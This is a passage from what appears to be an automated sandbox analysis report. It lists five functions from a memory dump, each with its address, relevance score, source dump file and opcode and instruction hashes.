                                                                          • Opcode Fuzzy Hash: f518be2ec91a7c6752d68483242a9debba4919cffedb56d2ec4127bf6693e2d2
                                                                          • Instruction Fuzzy Hash: 3E1120B5D002498BCB24CF9AC448BDEBBF8EB89324F15855AD529B7200D375A549CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04C60702 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GF{
                                                                          • API String ID: 0-1065277956
                                                                          • Opcode ID: a3a0f5288fe87fe155800efd85a7f5ed2a133ec77af0d9acfb65feb4012c8c29
                                                                          • Instruction ID: d6d3d44841a573a08c63b2c22be85d857de34dfaee66b21ec0f7f5f8d565aaaf
                                                                          • Opcode Fuzzy Hash: a3a0f5288fe87fe155800efd85a7f5ed2a133ec77af0d9acfb65feb4012c8c29
                                                                          • Instruction Fuzzy Hash: F7F0F071D08286DBCB01CFA3CCC428CFFB1AA12160B28861AE05277292EB20B002DF05
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04C606B0 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GF{
                                                                          • API String ID: 0-1065277956
                                                                          • Opcode ID: 7febc4fdacb53e0e669c8251a5b6f548619ada7b66d91791fbb7dbdc053764ba
                                                                          • Instruction ID: bf107dc42ae084a34b838188c3a8c912231c2a45e7058b0453b88753a005a1a2
                                                                          • Opcode Fuzzy Hash: 7febc4fdacb53e0e669c8251a5b6f548619ada7b66d91791fbb7dbdc053764ba
                                                                          • Instruction Fuzzy Hash: 51E086765010809BC704CF65CDDA689BBF5EF412D8B185496D9629F21BE6247002DB24
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04C602E4 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd0aae0c60e1006688c0b16af1be21d62d4ebe5d08b60e6ff1bd4a7d8b496f2a
                                                                          • Instruction ID: 38de0fb7c9fd2ecd64862650d174ca34593441398e3155160eba2d5026898376
                                                                          • Opcode Fuzzy Hash: bd0aae0c60e1006688c0b16af1be21d62d4ebe5d08b60e6ff1bd4a7d8b496f2a
                                                                          • Instruction Fuzzy Hash: D2F0CFB48042A9DFCB58CFA5DA8479CBBB1AB08315F10809AD406BB210DB301A88CF20
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04C60B21 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6511c75084f8304de459965e3bd66bead0726ed1c28ed8d5a4aa2be48825c0f8
                                                                          • Instruction ID: 2e161500c1846a392a8467846f76f86fb1831360d4da243b249f74e5602eca1f
                                                                          • Opcode Fuzzy Hash: 6511c75084f8304de459965e3bd66bead0726ed1c28ed8d5a4aa2be48825c0f8
                                                                          • Instruction Fuzzy Hash: AEE086210593D55AC753C3A4A9567D77F94AF03128B1842CBD9945F1E3D7260B42C286
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04C60B30 Relevance: .0, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 63be4395ba761676f48088cc11e9de040e6be40326b1c03ab7fe3bd45d1351bd
                                                                          • Instruction ID: 985f796fc38a9ddb5a7ee5c5c68181688511a37f57d31f7be48c761ef6f374d5
                                                                          • Opcode Fuzzy Hash: 63be4395ba761676f48088cc11e9de040e6be40326b1c03ab7fe3bd45d1351bd
                                                                          • Instruction Fuzzy Hash: 14D0A73081210CDBC744EFF4A54679EBBBCAB00604F6040A9890853241EB311F05C681
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%